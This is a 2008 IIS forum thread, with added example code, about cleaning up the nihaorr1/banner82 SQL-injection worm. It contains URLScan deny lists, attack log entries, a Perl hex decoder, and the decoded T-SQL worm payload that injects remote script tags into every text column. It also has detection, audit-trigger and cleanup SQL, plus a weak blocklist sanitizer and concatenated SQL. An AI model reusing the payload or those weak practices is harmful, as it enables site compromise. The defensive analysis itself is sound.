    NormalizeUrlBeforeScan=0
    VerifyNormalization=0
    AllowHighBitCharacters=1
    AllowDotInPath=1
    RemoveServerHeader=0
    EnableLogging=1
    PerProcessLogging=0
    AllowLateScanning=0
    PerDayLogging=1
    UseFastPathReject=0
    LogLongUrls=0
    UnescapeQueryString=1
    RejectResponseUrl=
    LoggingDirectory=Logs
    AlternateServerName=
    RuleList=Edge

    [Edge]
    AppliesTo=.asp,.aspx,.inc
    DenyDataSection=Edge Data
    ScanURL=0
    ScanAllRaw=0
    ScanQueryString=1
    ScanHeaders=

    [Edge Data]
    declare
    DECLARE
    cursor
    CURSOR

    [AllowVerbs]
    GET
    POST
    HEAD

    [DenyVerbs]
    PROPFIND
    CONNECT

    [DenyExtensions]
    .bat
    .cmd

    [DenyQueryStringSequences]
    <
    >

    If I try to use some of the ones I find on the net, it breaks most of my sites.

    Thanks for your time.

    silkyfixer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 01:25 PM|silkyfixer|LINK

    Here is a snippet from the URLScan log. You can see it kicks out the DECLARE, so how did it sneak through? I have about 500 websites that connect to the database, so it's hard to pinpoint where or how it gets through.

    [08-22-2008 - 11:41:59] Client at 80.99.117.220: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 11:46:44] Client at 189.46.158.208: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:05:47] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:05:48] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:13:54] Client at 59.29.234.153: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:20:58] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:20:59] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:39:22] Client at 201.34.214.205: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:39:45] Client at 85.99.42.197: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:43:10] Client at 124.121.28.118: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:49:21] Client at 201.211.113.200: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 12:58:06] Client at 122.168.200.189: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 13:04:54] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 13:05:58] Client at 122.163.163.163: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 13:08:22] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 13:19:44] Client at 195.225.178.21: QueryString contains sequence '%%3C', which is disallowed. Request will be rejected.  Site Instance='1643931472', Raw URL='/AddReview.asp', QueryString='txtName=Cialis&txtLocation=PaokyMzP&txtCmnts=Nise+site.%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.partyvibe.com%%2Fvbulletin%%2Fmember.php%%3Fu%%3D23082%%22%%3ECialis+kaufen%%3C%%2Fa%%3E%%2C++%%25DD%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EValium+online%%0D%%3C%%2Fa%%3E%%2C++5776%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fclaytonwilliams.html%%22%%3ETramadol%%3C%%2Fa%%3E%%2C++54245%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fvbulletin.thesite.org%%2Fmember.php%%3Fu%%3D31710%%22%%3Eviagra%%3C%%2Fa%%3E%%2C++renuiq%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fkeithbreunig.html%%22%%3EAmbien%%3C%%2Fa%%3E%%2C++nvnti%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fboard.muse.mu%%2Fmember.php%%3Fu%%3D98088%%22%%3EBuy+Tramadol+online%%0D%%3C%%2Fa%%3E%%2C++tbsvm%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EDiazepam%%3C%%2Fa%%3E%%2C++ivbp%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fcommunity.fotopic.net%%2Fuser%%2Fyyogml.html%%22%%3ECheap+Valium%%3C%%2Fa%%3E%%2C++1672%%2C+&escid=1010'

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 04:22 PM|steve schofield|LINK

    If you are running the RTW version of URLScan 3, the logs are W3C compliant and you can use Log Parser against them. Also, the logs you posted have the SITEID property. That would help narrow down which requests are being blocked.

    You could select the s-siteid property, sort it by ID ascending, then compare. That is one way off-hand if you have a lot of sites hitting the db.

    http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

    Another way would be to create a log parser script that goes through your w3svc files and pipes the data to an external file.  When hunting and pecking like this, copying the affected files to a separate location and hitting with log parser is effective.  You could have a recursive script copy the log to a single location then hit with log parser.  Hope that helps.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
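
    Steve's Log Parser suggestion made concrete, as an added example and not a query from any post in this thread: it pulls the hex-packed statements out of IIS W3C logs that have been copied into one folder. The folder `C:\logs\collected`, the file name `find_sqli.sql` and the CSV output are assumptions; the search patterns come from the request logged earlier in the thread (`CAST(0x... AS CHAR(4000))` ending in `EXEC(@S)`). Run it with Log Parser 2.2 from a command prompt on the server.

```sql
-- Added example (not from the thread): Log Parser 2.2 query over IIS W3C logs.
-- Save as find_sqli.sql and run:
--   LogParser.exe -i:IISW3C -o:CSV "file:find_sqli.sql" > sqli_hits.csv
-- C:\logs\collected is an assumption. If the copy keeps the W3SVC<site id> folder
-- names, LogFilename maps each hit back to one of the sites.
SELECT date, time,
       LogFilename,
       c-ip,
       cs-method,
       cs-uri-stem,
       sc-status,                                   -- 200: the ASP page ran; URLScan rejections normally log as 404
       STRLEN(cs-uri-query)        AS query_len,    -- the packed statements run to thousands of characters
       SUBSTR(cs-uri-query, 0, 80) AS query_prefix  -- enough to see DECLARE @S ... CAST(0x
FROM C:\logs\collected\*.log
WHERE TO_LOWERCASE(cs-uri-query) LIKE '%cast(0x%'    -- hex-packed statement, as in the entry quoted above
   OR TO_LOWERCASE(cs-uri-query) LIKE '%declare%@%'  -- plain-text variant
   OR TO_LOWERCASE(cs-uri-query) LIKE '%exec(%'      -- both forms finish with EXEC(@variable)
ORDER BY date, time
```

    Run it once as-is to list every attempt, then again with `AND sc-status = 200` added to the WHERE clause to keep only the requests the page actually executed. One caveat a practitioner needs here: the IIS log records the URL, query string and a few headers, and URLScan inspects the URL, query string and headers, so a payload delivered in a POSTed form field (which classic ASP's `Request("x")` reads exactly like a query-string value) leaves no trace in either place; that case has to be caught on the database side.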

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 06:22 PM|silkyfixer|LINK

    When this first happened to me last year, before the massive web attack, I copied all the log files to my Unix box and used grep to parse through the files. It took me a while to pinpoint the injection since it was not in the wild at the time. I had a coder write a decrypt script to decode the hex:

    #!/usr/bin/perl
    use strict;
    use warnings;

    # Hex dump of the injected statement, copied from the IIS log (the part after CAST(0x).
    my $s=<<"EOF";
    4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
    52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
    45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
    622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
    61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
    5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
    2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
    204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
    4F43415445205461626C655F437572736F72
    EOF

    $s =~ s/\s+//g;   # drop the line breaks so the two-character pairs stay aligned

    while (length($s) > 0) {
        my $hex = substr($s, 0, 2);
        $s = substr($s, 2);
        print pack("C", hex($hex));   # each pair is one ASCII character of the T-SQL
    }
    print "\n";

    Now decoded, you notice that it's what was in the wild:

    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    The question is: have they found a new way to inject without the DECLARE, or a way around de-quoting the injection? I have a feeling it's a new type of attack and they don't use a DECLARE.

    I will sift through the logs and see what I can find, but it's hard when you have hundreds of sites and log files.

    It would be great if someone could write a trigger for MSSQL so that any time an update contains %<script etc. it will tell me what site it came from. This would help out greatly as I can then pinpoint where it came from. Maybe mssql-scan :)

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 25, 2008 10:38 PM|silkyfixer|LINK

    OK, I have no idea, but somehow URLScan is not working. I put in the statements of your config and it still got infected today. There must be some way around the DECLARE statement.

    Is there any way to create a trigger on the MSSQL database to tell me what site the update injects the script code from? Since I never insert or update any of my tables with <script in it, I think this will pinpoint where the attack is coming from.

    My URLScan shows it blocking DECLARE and other random injections, but it still gets infected. So I would assume they are no longer using a DECLARE statement, or have a way around the DECLARE statement.

    Again, over 500 sites connect to the same database, so I have no idea how or where the injection comes from.

    I am not a coder, so I would not know where or how to write a trigger to store in a log file where the injection came from.

    Thank you

    silkyfixer
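
    SQL Server has no database-wide DML trigger, but a script can generate one AFTER INSERT, UPDATE trigger per user table, which is what the request above amounts to. The following is an added example, not code from any post in this thread, written for SQL Server 2005 or later; the audit table name, the trigger name prefix and the 500-character sample are assumptions. It records the login, `APP_NAME()` and `HOST_NAME()` of every write that carries `<script`. With 500 sites on the same web servers, `HOST_NAME()` only names the server; to get the site, each site's connection string needs its own `Application Name=<site>` (`App=` for ODBC), because that is what `APP_NAME()` returns. Neither IIS logs nor URLScan see request bodies, so this is the check that still catches an injection delivered in a POSTed form field.

```sql
-- Added example (not from the thread): an audit table plus one AFTER INSERT, UPDATE trigger
-- per user table that logs writes containing '<script'. SQL Server 2005+; names are assumptions.
SET NOCOUNT ON;

IF OBJECT_ID(N'dbo.ScriptInjectionAudit') IS NULL
    CREATE TABLE dbo.ScriptInjectionAudit (
        AuditId    int IDENTITY(1,1) NOT NULL PRIMARY KEY,
        AuditTime  datetime       NOT NULL DEFAULT GETDATE(),
        TableName  nvarchar(300)  NOT NULL,
        ColumnName sysname        NOT NULL,
        RowsHit    int            NOT NULL,   -- rows in the statement that carried the tag
        LoginName  sysname        NOT NULL,   -- SUSER_SNAME(): login the site connects with
        AppName    nvarchar(128)  NULL,       -- APP_NAME(): "Application Name=" from the connection string
        HostName   nvarchar(128)  NULL,       -- HOST_NAME(): web server that issued the write
        Sample     nvarchar(500)  NULL        -- first offending value, truncated
    );

DECLARE @schema sysname, @table sysname, @trig sysname,
        @qname nvarchar(300), @tbl_lit nvarchar(600),
        @checks nvarchar(max), @sql nvarchar(max);

DECLARE tbl CURSOR LOCAL FAST_FORWARD FOR
    SELECT TABLE_SCHEMA, TABLE_NAME
    FROM INFORMATION_SCHEMA.TABLES
    WHERE TABLE_TYPE = 'BASE TABLE'
      AND NOT (TABLE_SCHEMA = 'dbo' AND TABLE_NAME = 'ScriptInjectionAudit');

OPEN tbl;
FETCH NEXT FROM tbl INTO @schema, @table;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @trig    = N'trg_audit_script_' + @table;
    SET @qname   = QUOTENAME(@schema) + N'.' + QUOTENAME(@trig);
    -- Names end up inside string literals in the generated DDL, so escape quotes in them.
    SET @tbl_lit = REPLACE(@schema + N'.' + @table, N'''', N'''''');

    -- One INSERT per string column. text/ntext are skipped: an AFTER trigger cannot read them
    -- from "inserted" (error 311). Convert such columns to (n)varchar(max) to cover them.
    SET @checks = N'';
    SELECT @checks = @checks + N'
        INSERT dbo.ScriptInjectionAudit (TableName, ColumnName, RowsHit, LoginName, AppName, HostName, Sample)
        SELECT TOP 1 N''' + @tbl_lit + N''', N''' + REPLACE(COLUMN_NAME, N'''', N'''''') + N''',
               (SELECT COUNT(*) FROM inserted WHERE ' + QUOTENAME(COLUMN_NAME) + N' LIKE N''%<script%''),
               SUSER_SNAME(), APP_NAME(), HOST_NAME(), LEFT(' + QUOTENAME(COLUMN_NAME) + N', 500)
        FROM inserted WHERE ' + QUOTENAME(COLUMN_NAME) + N' LIKE N''%<script%'';'
    FROM INFORMATION_SCHEMA.COLUMNS
    WHERE TABLE_SCHEMA = @schema AND TABLE_NAME = @table
      AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar');

    IF @checks <> N''
    BEGIN
        SET @sql = N'IF OBJECT_ID(N''' + REPLACE(@qname, N'''', N'''''') + N''', N''TR'') IS NOT NULL DROP TRIGGER ' + @qname + N';';
        EXEC (@sql);
        SET @sql = N'CREATE TRIGGER ' + @qname
                 + N' ON ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
                 + N' AFTER INSERT, UPDATE AS BEGIN SET NOCOUNT ON;' + @checks + N' END';
        EXEC (@sql);
    END
    FETCH NEXT FROM tbl INTO @schema, @table;
END
CLOSE tbl;
DEALLOCATE tbl;

-- What to look at after the next infection: which login/app/host wrote the tag, and where.
SELECT TOP 50 * FROM dbo.ScriptInjectionAudit ORDER BY AuditTime DESC;
```

    The worm's payload issues one UPDATE per text column, so each hit shows up as one audit row per table and column with `RowsHit` telling you how many rows it touched. The triggers only record; to stop the write as well, add `RAISERROR` and `ROLLBACK` after the INSERT in the generated body, which is safe only if legitimate rows never contain `<script`. The audit table and the triggers are both dbo-owned, so ownership chaining lets the sites' logins write audit rows without an extra GRANT. Drop the triggers once the offending site is found.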

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 26, 2008 12:21 AM|silkyfixer|LINK

    The problem is that I can dump all the logs and parse through them, but I don't know what to look for. Since URLScan kicks out the DECLARE, it must be something else.

    silkyfixer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Dec 12, 2008 09:14 PM|Paul Bishop|LINK

    This is an SQL injection attack. You must remove the <script ..... to ...</script>.

    It copies itself to the end of any text column it can.

    In ASP:

    <%
    ' Doubles single quotes so the value can be embedded in a SQL string literal.
    function stripQuotes(strWords)
        stripQuotes = replace(strWords, "'", "''")
    end function

    ' Blocklist filter: removes a fixed set of SQL fragments from the input.
    ' vbTextCompare makes the match case-insensitive; the default Replace is case-sensitive
    ' and would leave "SELECT " alone. The list does not include CAST, DECLARE or EXEC,
    ' which the payloads shown in this thread use.
    function killChars(strWords)
        dim badChars, newChars, i
        badChars = array("select ", "drop ", ";", "--", "insert ", "delete ", "xp_", " or ", "or ")
        newChars = strWords
        for i = 0 to uBound(badChars)
            newChars = replace(newChars, badChars(i), "", 1, -1, vbTextCompare)
        next
        killChars = newChars
    end function

    bco = stripQuotes(killChars(replace(request("bco"), "'", "")))
    %>

    You must use this on all requested data.

    You must even use it on things like request server variables, because the 1.js file link can be attached to OS or ref server vars.

    Do it on the back end as well, or on a textbox, checkbox or radio button: if you are requesting it, it can be attached. No need to worry about session objects unless you request an element and assign it to a session object. Integers are not affected.

    This is a sample script of how to remove it from the db. os is the text column:

    <% Response.Buffer = False %>

    <%
    Server.ScriptTimeout = 50000

    ' dbSubs is the poster's open ADO connection (its creation is not shown in the post).
    Dim pida(4500000)    ' osid of each row that needs fixing
    Dim descr(4500000)   ' the cleaned os value for that row
    Dim i, p, RS, SQLStmt, descrx
    i = 0

    SQLStmt = "SELECT osid, os FROM OS"
    Set RS = dbSubs.Execute(SQLStmt)
    Do While Not RS.EOF   ' the post used a helper checkrs(rs), not shown; this is its obvious meaning
        If Len(RS("os")) > 0 Then
            pida(i) = RS("osid")
            descrx = Replace(RS("os"), "<script src=http://17gamo.com/1.js></script>", "")
            ' apostrophes are dropped because the UPDATE below is built by string concatenation
            descr(i) = Replace(descrx, "'", "")
            i = i + 1
        End If
        RS.MoveNext
    Loop

    For p = 0 To i - 1
        Response.Write pida(p) & " " & descr(p) & "<br>"
        SQLStmt = "UPDATE OS SET os = '" & descr(p) & "' WHERE osid = '" & pida(p) & "'"
        dbSubs.Execute SQLStmt
    Next
    %>
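
    The same cleanup done set-based in T-SQL, added here as an example rather than Paul Bishop's code: it runs once per text column instead of once per row, and it needs no quote-stripping because nothing is concatenated into a statement. Table `OS` and column `os` and the `17gamo.com` tag value are taken from the post above; the transaction wrapper and the 120-character tag preview are assumptions about how you would want to run it.

```sql
-- Added example (not the code from the post above): set-based cleanup of one text column.
-- Run the SELECTs first, then the UPDATE, and COMMIT only when still_infected comes back 0.
DECLARE @tag varchar(200);
SET @tag = '<script src=http://17gamo.com/1.js></script>';   -- exact string to remove; one run per variant
                                                              -- (escape [ % _ in @tag if a variant contains them)

-- 0. Which tags are actually present? This thread shows several hosts (nihaorr1.com, banner82.com,
--    17gamo.com, douhunqn.cn), and the 22 Aug log entry decodes to a variant that prepends its tag
--    (and comments out the rest of the page with <!--), so look anywhere in the value, not just at the end.
SELECT DISTINCT SUBSTRING(os, CHARINDEX('<script', os), 120) AS injected_tag
FROM dbo.OS
WHERE os LIKE '%<script%';

BEGIN TRAN;

-- 1. Rows carrying @tag, and how many carry it more than once (the worm re-appends on every run).
SELECT COUNT(*) AS infected_rows,
       SUM(CASE WHEN os LIKE '%' + @tag + '%' + @tag + '%' THEN 1 ELSE 0 END) AS multi_hit_rows
FROM dbo.OS
WHERE os LIKE '%' + @tag + '%';

-- 2. REPLACE removes every occurrence, so repeatedly infected rows are cleaned in one pass.
--    For a text/ntext column on SQL Server 2005+, use REPLACE(CAST(os AS varchar(max)), @tag, '').
UPDATE dbo.OS
SET os = REPLACE(os, @tag, '')
WHERE os LIKE '%' + @tag + '%';

-- 3. Anything left means another variant is present: go back to step 0 with the next @tag.
SELECT COUNT(*) AS still_infected
FROM dbo.OS
WHERE os LIKE '%<script%';

-- COMMIT TRAN;    -- when still_infected is 0
-- ROLLBACK TRAN;  -- otherwise
```

    Step 0 is the one to keep around: it tells you which variant hit you this time, and it is cheap to run against every text column the worm targets (the decoded payload above lists them as `sysobjects`/`syscolumns` with xtype 35, 99, 167 and 231, that is text, ntext, varchar and nvarchar).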